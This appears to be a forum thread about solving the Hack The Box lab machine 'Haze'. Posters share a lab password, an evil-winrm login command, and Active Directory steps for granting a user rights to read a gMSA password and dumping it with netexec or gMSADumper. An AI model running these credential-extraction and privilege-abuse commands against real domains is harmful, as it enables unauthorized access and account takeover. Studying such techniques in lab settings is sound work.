Mar 29, 2025, 08:23 PM
evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i haze.htb
|
Haze - Hack The Box Season 7 - Windows Hard
by ShitWhiffler - Saturday March 29, 2025 at 06:59 PM
|
|
Mar 29, 2025, 08:23 PM
evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i haze.htb
Mar 29, 2025, 09:31 PM
did someone get anything?
Mar 29, 2025, 09:33 PM
besides mark.adams being in gMSA_Managers, nothing.
Mar 29, 2025, 09:53 PM
how did u get this password for paul ? seems uncrackable through hashcat
This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Reposting hidden content for free
Mar 29, 2025, 09:55 PM
Mar 29, 2025, 10:05 PM
(Mar 29, 2025, 09:55 PM)pop10189 Wrote:(Mar 29, 2025, 09:33 PM)jaybit Wrote: besides mark.adams being in gMSA_Managers, nothing. I was not able to do that. Can you tell how?
Mar 29, 2025, 10:12 PM
(Mar 29, 2025, 10:05 PM)kyakeiuwu Wrote:(Mar 29, 2025, 09:55 PM)pop10189 Wrote:(Mar 29, 2025, 09:33 PM)jaybit Wrote: besides mark.adams being in gMSA_Managers, nothing. look for GMSA section https://notes.qazeer.io/active-directory...exploiting Then extract the GMSA using netexec ldap -u mark... -p .... --gmsa
Mar 29, 2025, 10:16 PM
(Mar 29, 2025, 10:12 PM)pop10189 Wrote:(Mar 29, 2025, 10:05 PM)kyakeiuwu Wrote:(Mar 29, 2025, 09:55 PM)pop10189 Wrote:(Mar 29, 2025, 09:33 PM)jaybit Wrote: besides mark.adams being in gMSA_Managers, nothing. Account: Haze-IT-Backup$ NTLM: I literally got this as the hash no NTLM
Mar 29, 2025, 10:29 PM
(Mar 29, 2025, 10:16 PM)kyakeiuwu Wrote:(Mar 29, 2025, 10:12 PM)pop10189 Wrote:(Mar 29, 2025, 10:05 PM)kyakeiuwu Wrote:(Mar 29, 2025, 09:55 PM)pop10189 Wrote:(Mar 29, 2025, 09:33 PM)jaybit Wrote: besides mark.adams being in gMSA_Managers, nothing. First you need to add your self as a member to read Gmsa
Mar 29, 2025, 10:39 PM
(Mar 29, 2025, 10:16 PM)kyakeiuwu Wrote:(Mar 29, 2025, 10:12 PM)pop10189 Wrote:(Mar 29, 2025, 10:05 PM)kyakeiuwu Wrote:(Mar 29, 2025, 09:55 PM)pop10189 Wrote:(Mar 29, 2025, 09:33 PM)jaybit Wrote: besides mark.adams being in gMSA_Managers, nothing. Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams" $user = Get-ADUser -Identity "mark.adams" Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword $user.DistinguishedName then gMSADumper should work |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] CPTS • CWES • CDSA • CWEE Exam Hint | 234 | 33,154 |
4 hours ago Last Post: breachaddictt |
||
| [FREE] HackTheBox Dante - complete writeup written by Tamarisk | 608 | 95,966 |
4 hours ago Last Post: breachaddictt |
||
|
|
[FREE] HackTheBox All Cheatsheets | 30 | 1,855 |
4 hours ago Last Post: breachaddictt |
|
| [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot | 106 | 10,203 |
7 hours ago Last Post: kkkreoifezrg |
||
| JET fortress writeup + flags | 39 | 19,208 |
8 hours ago Last Post: vlxw |
||